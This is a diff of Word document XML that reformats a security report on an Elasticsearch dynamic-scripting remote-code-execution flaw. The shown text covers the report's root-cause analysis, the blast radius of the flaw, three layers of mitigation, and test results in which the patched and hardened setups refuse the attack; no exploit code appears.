-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> because the vendor treats</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>the API as privileged; on the network there is no credential at all, which is</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>why the effective attack is pre-auth RCE.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-        <w:spacing w:after="40"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>Blast radius.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> The node runs as root in this image, so the first command</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>already has full control: read the data directory, reach the network, or</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>exhaust the heap.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>The defect is therefore an access-control failure around a dangerous capability</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>(CWE-284): code evaluation was treated as an ordinary data field. Every later</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>fix is a way of taking that capability away from the client.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>[[SCREENSHOT: elasticsearch.yml showing script.disable_dynamic absent / default]]</w:t>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="808080"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Screenshot: elasticsearch.yml showing script.disable_dynamic absent / default</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4052,7 +3727,7 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -4073,211 +3748,164 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>,</w:t>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>vulnerability/fixed/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>):</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:spacing w:after="40"/>
+        <w:ind w:left="425" w:hanging="425"/>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>1.</w:t>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Configuration (mitigation)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> — </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>vulnerability/fixed/</w:t>
+        <w:t>script.disable_dynamic: true</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>):</w:t>
+        <w:t xml:space="preserve"> on the same 1.1.1 image. The node refuses to compile scripts arriving in a request; the search fails with </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>ScriptException[dynamic scripting disabled]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
         <w:spacing w:after="40"/>
+        <w:ind w:left="425" w:hanging="425"/>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>2.</w:t>
+        <w:tab/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>Configuration (mitigation)</w:t>
+        <w:t>Patch (upgrade)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> — </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>script.disable_dynamic: true</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> on the same</w:t>
+        <w:t xml:space="preserve"> — Elasticsearch 1.4.4. Dynamic scripting has been off by default since 1.2, and 1.4 adds a Groovy sandbox that filters classes.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:spacing w:after="40"/>
+        <w:ind w:left="425" w:hanging="425"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>1.1.1 image. The node refuses to compile scripts arriving in a request; the</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">search fails with </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>ScriptException[dynamic scripting disabled]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-        <w:spacing w:after="40"/>
-      </w:pPr>
+        <w:t>3.</w:t>
+        <w:tab/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>Patch (upgrade)</w:t>
+        <w:t>Design</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> — Elasticsearch 1.4.4. Dynamic scripting has been off by</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
+        <w:t xml:space="preserve"> — do not expose the scripting API to clients at all: network ACL, a reverse proxy that rejects </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>script</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>default since 1.2, and 1.4 adds a Groovy sandbox that filters classes.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-        <w:spacing w:after="40"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>Design</w:t>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>source</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> — do not expose the scripting API to clients at all: network ACL,</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">a reverse proxy that rejects </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>script</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>source</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> in requests, or Elasticsearch</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>≥ 2.0, where dynamic scripting was removed.</w:t>
+        <w:t xml:space="preserve"> in requests, or Elasticsearch ≥ 2.0, where dynamic scripting was removed.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4306,105 +3934,29 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>Why this is effective: layer 1 removes the primitive ("compile what the client</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
+        <w:t xml:space="preserve">Why this is effective: layer 1 removes the primitive ("compile what the client sent"), layer 2 removes it by default and adds a sandbox, layer 3 removes it from the reachable surface. A nuance worth stating in the report: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>1.4.4 is not the end of the story</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>sent"), layer 2 removes it by default and adds a sandbox, layer 3 removes it from</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>the reachable surface. A nuance worth stating in the report: **1.4.4 is not the</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>end of the story** — in 2015 the 1.4.x sandbox was bypassed again</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>(CVE-2015-1427, Groovy sandbox escape) and 1.4.4 is still in that affected</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>range. That is precisely why the design layer is the durable one: "no</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>client-supplied scripts" survives the next clever expression, while a sandbox</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>has to be perfect every time.</w:t>
+        <w:t xml:space="preserve"> — in 2015 the 1.4.x sandbox was bypassed again (CVE-2015-1427, Groovy sandbox escape) and 1.4.4 is still in that affected range. That is precisely why the design layer is the durable one: "no client-supplied scripts" survives the next clever expression, while a sandbox has to be perfect every time.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4423,7 +3975,7 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -4477,27 +4029,44 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>To separate *mitigation* from *patch*, the vulnerable 1.1.1 image was also run</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
+        <w:t xml:space="preserve">To separate </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>mitigation</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">with </w:t>
+        <w:t xml:space="preserve"> from </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>patch</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, the vulnerable 1.1.1 image was also run with </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4511,20 +4080,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>, i.e. the code is still 1.1.1 but the</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>capability is switched off.</w:t>
+        <w:t>, i.e. the code is still 1.1.1 but the capability is switched off.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -4545,6 +4101,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -4581,6 +4140,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -4601,6 +4163,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -4621,6 +4186,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -4643,6 +4211,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -4665,6 +4236,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -4695,6 +4269,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -4711,6 +4288,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -4728,6 +4308,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -4757,6 +4340,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -4787,6 +4373,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -4802,6 +4391,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -4819,6 +4411,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -4841,6 +4436,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -4871,6 +4469,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -4886,6 +4487,9 @@
             <w:tcW w:type="dxa" w:w="2339"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -4902,7 +4506,7 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -4935,20 +4539,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>row 2 is the mitigation alone — same vulnerable code, attack refused, so the</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>fix does not depend on the upgrade being possible;</w:t>
+        <w:t>row 2 is the mitigation alone — same vulnerable code, attack refused, so the fix does not depend on the upgrade being possible;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4961,39 +4552,13 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>row 3 is the patched release — the request dies before any script is</w:t>
+        <w:t>row 3 is the patched release — the request dies before any script is compiled, and the error names the new default engine (Groovy), which shows the server still understands the request but no longer evaluates it.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>compiled, and the error names the new default engine (Groovy), which shows</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>the server still understands the request but no longer evaluates it.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -5062,7 +4627,7 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -5087,29 +4652,23 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>[[SCREENSHOT: fixed environment – attack returns 400, no file created, search still returns 1 hit]]</w:t>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="808080"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Screenshot: fixed environment – attack returns 400, no file created, search still returns 1 hit</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>[[SCREENSHOT: hardened 1.1.1 – same 400 rejection, site still functional]]</w:t>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="808080"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Screenshot: hardened 1.1.1 – same 400 rejection, site still functional</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5128,171 +4687,71 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>The work produced (a) a working API whose security properties are enforced in</w:t>
+        <w:t xml:space="preserve">The work produced (a) a working API whose security properties are enforced in code </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>and</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pinned by tests, (b) a CI pipeline that fails on a medium SAST finding or a vulnerable dependency, and (c) a reproducible exploitation-and-fix cycle for a real CVE.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
